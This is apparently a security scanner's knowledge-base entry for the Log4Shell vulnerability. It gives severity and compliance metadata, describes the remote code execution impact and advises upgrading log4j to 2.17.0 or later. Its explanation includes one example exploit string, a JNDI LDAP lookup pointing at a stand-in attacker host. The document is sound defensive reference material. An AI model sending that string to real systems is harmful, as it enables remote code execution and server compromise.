Skip to content

Latest commit

 

History

History
29 lines (23 loc) · 1.18 KB

log4shell.md

File metadata and controls

29 lines (23 loc) · 1.18 KB
name severity cvss-score cvss-vector cwe-id cwe-name compliance
Log4Shell
high
10.0
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-917
Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
HIPAA ISO 27001 owasp10 pci PCI v4.0
164.306(a)
A.5.33, A.5.34, A.8.3, A.8.9, A.8.12
A3
6.5.1
pci4-6.2.4

A remote code execution vulnerability (RCE) allows the attacker to execute arbitrary code and operating system commands on the server. In the worst-case scenario, the attacker will be able to fully compromise the server, extract sensitive data, modify the application contents or delete data.

The log4j RCE vulnerability can be easily exploited. All you need is to find a vulnerable version of log4j, an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string (e.g. ${jndi:ldap://attacker.com/a}), and a log statement that logs out the string from that request.

How to fix

{% tabs log4shell %} {% tab log4shell generic %} To fix the Log4Shell vulnerability, you need to update all instances of log4j to version 2.17.0 or above. {% endtab %}

{% endtabs %}